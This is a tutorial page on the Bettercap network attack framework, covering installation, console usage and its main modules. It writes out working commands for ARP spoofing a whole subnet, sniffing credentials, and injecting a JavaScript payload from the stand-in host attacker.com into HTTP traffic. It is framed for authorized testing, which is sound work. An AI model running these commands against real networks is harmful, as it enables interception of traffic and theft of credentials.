What is Bettercap?
Bettercap is a powerful, modular network attack and monitoring framework written in Go. It is designed as the modern successor to ettercap and covers a wide range of attack surfaces: Ethernet LAN (ARP spoofing, MITM), 802.11 WiFi (deauth, handshake capture, probe sniffing), Bluetooth Low Energy (BLE enumeration), and HID injection. It features both an interactive CLI and a built-in web interface, making it one of the most versatile tools for authorized network security assessments.
Only use on systems you own or have explicit written permission to test. Unauthorized use violates Pakistan's PECA 2016 and international cybercrime laws.
Installation
    # Update packages
    sudo apt update

    # Install Bettercap (pre-installed on Kali)
    sudo apt install bettercap -y

    # OR install latest via Go
    go install github.com/bettercap/bettercap@latest

    # Update Bettercap's caplet and module list
    sudo bettercap -eval "caplets.update; ui.update; quit"

    # Verify
    bettercap --version
Basic Usage
Bettercap uses an interactive REPL console with modules that are toggled on/off. Run as root — it requires raw socket access.
    # Launch on a specific network interface
    sudo bettercap -iface eth0

    # Launch with the built-in web UI (browser at http://127.0.0.1:80)
    sudo bettercap -caplet http-ui

    # Run a caplet (pre-written attack script) directly
    sudo bettercap -caplet mitm.cap

    # Inside the interactive console:

    # Discover all hosts on the network
    net.probe on
    net.show

    # Start ARP spoofing against all hosts (full MITM)
    set arp.spoof.fullduplex true
    set arp.spoof.targets 192.168.1.0/24
    arp.spoof on

    # Enable HTTP/S sniffing to capture credentials
    net.sniff on

    # Inject a JavaScript payload into HTTP responses
    set http.proxy.injectjs http://attacker.com/payload.js
    http.proxy on
Key Modules
- net.probe — Actively discover live hosts on the local network
- arp.spoof — ARP cache poisoning for MITM positioning
- net.sniff — Passive packet capture and credential extraction
- http.proxy — Transparent HTTP proxy with JS/HTML injection support
- https.proxy — HTTPS proxy via SSL stripping (requires valid cert setup)
- dns.spoof — Redirect DNS queries to attacker-controlled IPs
- wifi — 802.11 monitor mode, deauth attacks, handshake capture
- ble.recon — Scan and enumerate nearby Bluetooth Low Energy devices
Common Use Cases
- Authorized LAN penetration testing and MITM assessments
- CTF (Capture The Flag) competitions involving network traffic
- Internal red team wireless and wired network audits
- Security awareness demonstrations (credential interception on HTTP)
Tips & Best Practices
Always enable arp.spoof.fullduplex before starting ARP spoofing — without it you only poison one direction and traffic analysis will be incomplete. Use caplets (pre-written .cap scripts) to automate repeatable attack chains instead of typing commands manually each session. The community caplet repository on GitHub contains ready-made scripts for common scenarios like credential harvesting and network recon.
Practice on legal targets like TryHackMe, HackTheBox, or hackzia.site labs before using in live engagements.